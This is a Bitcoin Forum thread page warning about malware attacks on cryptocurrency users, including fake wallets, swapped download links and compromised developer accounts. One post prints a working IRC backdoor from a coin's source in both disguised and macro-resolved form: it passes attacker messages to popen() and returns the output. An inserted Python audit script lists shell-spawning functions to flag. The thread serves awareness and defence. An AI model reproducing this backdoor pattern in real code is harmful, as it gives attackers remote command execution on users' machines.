Bitcoin Forum
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 696752 times)
Hoxysado
Full Member | Activity: 392 | Merit: 100
May 06, 2018, 06:58:59 PM  #621

I'm adding this to the list of possible scams:

https://bitcointalk.org/index.php?topic=951827.0
Thank you so much! I hope the people who committed that crime will find their punishment! And, of course, poor people who lost their money.
Tonymillions
Newbie | Activity: 131 | Merit: 0
May 07, 2018, 08:28:06 AM  #622

OMG

I can't believe this information.
Thank you guys.
I will pass the message across.

Thanks
Miminaha
Member | Activity: 368 | Merit: 10
May 07, 2018, 09:38:33 PM  #623

In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
// Triggers on an IRC PRIVMSG whose text begins with ":!". vWords is the
// space-split IRC line, so everything from vWords[4] onward is attacker-supplied.
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // CRead resolves to popen(): the rest of the message is executed by the shell.
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        // Collect the command output...
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        // ...then message it back to the sender's nick (vWords[0] is ":nick!user@host").
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
// Same logic with the aliases expanded: CBuff is "PRIVMSG", CLine is FILE,
// CRead is popen and CFree is pclose.
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The text following ":!" is handed to popen(), i.e. run by /bin/sh.
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        // Read back whatever the command printed...
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // ...and send it to the nick that issued the command.
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
Thank you so much for the information. I think we all must be more careful when we deal with our money; you have inspired me to review my antivirus.
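A defender-side check that follows from the backdoor quoted above, added here as an example and not code from this thread or from any coin's repository: a small Python audit script that scans C/C++ source for process-spawning calls and resolves object-like #define aliases first, so that a popen() renamed to CRead (as in the quoted snippet) is still flagged. The sample source embedded below is constructed to mirror the quoted snippet; its #define lines are an assumption about how the macros were declared, since the post shows only the macro names and their resolved forms.

```python
"""Source-audit helper: flag process-spawning calls in C/C++ code even when they
are hidden behind #define aliases, as CRead -> popen was in the backdoor above.

Constructed example for this thread; not code from any coin's repository.
"""
import re
from typing import Dict, List, Tuple

# Functions that hand a string to a shell or spawn a process. Any of these fed
# with data from the network (an IRC line, an RPC body) is a remote code
# execution sink and needs a very good reason to exist in a wallet.
SHELL_SINKS = {
    "popen", "_popen", "system", "_wsystem",
    "execl", "execlp", "execle", "execv", "execvp", "execvpe",
    "posix_spawn", "posix_spawnp",
    "ShellExecuteA", "ShellExecuteW", "CreateProcessA", "CreateProcessW",
}

# Object-like macros only: "#define NAME replacement" on a single line.
DEFINE_RE = re.compile(
    r'^[ \t]*#[ \t]*define[ \t]+([A-Za-z_]\w*)[ \t]+(.+?)[ \t]*$', re.M)
# Anything that looks like a call: identifier followed by "(".
CALL_RE = re.compile(r'\b([A-Za-z_]\w*)\s*\(')


def collect_aliases(source: str) -> Dict[str, str]:
    """Map each macro name to its final expansion, following chains such as
    '#define CSpawn CRead' / '#define CRead popen' (bounded, so cycles end)."""
    raw = {name: value.strip("() ") for name, value in DEFINE_RE.findall(source)}
    resolved: Dict[str, str] = {}
    for name in raw:
        cur, seen = name, set()
        while cur in raw and cur not in seen:
            seen.add(cur)
            cur = raw[cur]
        resolved[name] = cur
    return resolved


def find_shell_sinks(source: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, identifier_as_written, resolved_sink) for every call
    whose callee, after macro resolution, is a process-spawning function."""
    aliases = collect_aliases(source)
    hits: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # the #define lines themselves are not calls
        for ident in CALL_RE.findall(line):
            target = aliases.get(ident, ident)
            if target in SHELL_SINKS:
                hits.append((lineno, ident, target))
    return hits


# Constructed sample mirroring the quoted snippet. The #define lines are an
# assumption about how the macros were declared; the thread shows only the
# macro names and their resolved forms.
SAMPLE = """\
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
#define CSpawn CRead

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
    }
}
"""

if __name__ == "__main__":
    for lineno, ident, target in find_shell_sinks(SAMPLE):
        print(f"line {lineno}: {ident}(...) resolves to {target}()")
```

Run over a whole tree (for example with find and xargs), every hit deserves a reviewer's eye: as the quoted snippet shows, the dangerous call can be present from the very first commit, can be disguised by a harmless-looking macro name, and will never show up in a virus scan of the built binary.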
Hoxysado
Full Member | Activity: 392 | Merit: 100
May 09, 2018, 07:58:02 PM  #624

I cannot understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
Yeah, I can understand why you are so annoyed about it.
Let's hope that they will work out something soon.
bitbloq.io
Copper Member, Newbie | Activity: 33 | Merit: 0
May 09, 2018, 08:00:26 PM  #625

I know it can be hard to believe but nobody should be shocked. It happens and we can always increase security, but it will never be 100% secure. Think about it, if someone is smart enough to make it, then that just means there is somebody out there smarter that can break it.
Israel712
Newbie | Activity: 112 | Merit: 0
May 10, 2018, 05:39:29 AM  #626

I really commend your effort in sensitizing forum members. I would also like a continuous update on this all-important issue, to save us from the pains scammers intend to inflict, especially on novices like us. Thanks a lot.
dangphananh
Newbie | Activity: 184 | Merit: 0
May 10, 2018, 03:32:39 PM  #627

Bad software scares people the most. I use cash for complete security and I recommend doing so.
Seram1
Newbie | Activity: 197 | Merit: 0
May 10, 2018, 07:42:31 PM  #628

Quote from: Miminaha, post #623 above (quoted in full)
Indeed, we must always be careful in maintaining our assets, because there are always thieves everywhere. If your assets are gone you cannot report where to go, because it will be difficult to find him. Better to prevent before something happens that we do not want.
Seram1
Newbie | Activity: 197 | Merit: 0
May 10, 2018, 08:42:05 PM  #629

Quote from: Hoxysado, post #624 above (quoted in full)
I think the wallet created by the developers is good. All that is not perfect there must be advantages and disadvantages let alone this online system, so if you do not want to lose your assets, you also have to be careful and careful in storing your assets.
loinguyen1984
Newbie | Activity: 17 | Merit: 0
May 11, 2018, 03:01:12 AM  #630

I am a new member, please help
kalstarzz
Full Member | Activity: 770 | Merit: 100
May 11, 2018, 06:07:50 PM  #631

This virus has spread and will hurt many people.
If the antivirus is no longer functioning, how can we avoid the virus attack?
novak hiel
Newbie | Activity: 77 | Merit: 0
May 13, 2018, 01:21:16 PM  #632

Are there still malware infection attempts? Thank you!!
Wiliam heil
Newbie | Activity: 70 | Merit: 0
May 14, 2018, 09:04:31 AM  #633

I am a newbie and thanks for informing. I would like to ask how we can spot a scammer.
yetiripper
Full Member | Activity: 250 | Merit: 100
May 14, 2018, 12:12:14 PM  #634

This year I am working on getting different wallets and a separate apple so that all the extra programs that I use do not counteract with the system operation itself.
edison benzamin
Newbie | Activity: 52 | Merit: 0
May 15, 2018, 03:47:54 PM  #635

I led a large number of bounty, recorded everything on a flash drive, all tables, all the links, and what do you think? All burned, all my work, all I did for weeks. I'm tired of this, really it is impossible to fight?
ProfessorZ
Copper Member, Jr. Member | Activity: 84 | Merit: 1
May 15, 2018, 11:28:19 PM  #636

I recommend engraving the mnemonic phrase on a stainless steel plate (both fire- and water-proof, high corrosion resistance) and burying it in a safe location; a very good method to hold your coins longer than you have planned; better than an air-gapped computer and 100% hack-proof.
omareckmac
Member | Activity: 434 | Merit: 15
May 16, 2018, 05:30:35 AM  #637

Nothing changes - the usual wallet is always interesting to thieves, and electronic - to various kinds of scammers. For reliable storage of electronic coins, it is better to start a so-called cool wallet on a computer that is not normally connected to the network.

Crypto11021
Newbie | Activity: 107 | Merit: 0
May 16, 2018, 07:56:27 AM  #638

If you can post the coins name it will be better
ProfessorZ
Copper Member, Jr. Member | Activity: 84 | Merit: 1
May 16, 2018, 09:14:47 AM  #639

If you thought air-gapped devices are safe, read this: https://arstechnica.com/information-technology/2018/04/new-hacks-siphon-private-cryptocurrency-keys-from-airgapped-wallets/

Sounds to me like Person of interest, but still feasible in some ideal conditions.
Negdan4ik
Member | Activity: 230 | Merit: 10
May 16, 2018, 04:39:48 PM  #640

I think we should be very careful about the infestations. Thank you very much for the overview and useful information. I think that this site is very useful for scammers who want easy money. Forewarned is forearmed.
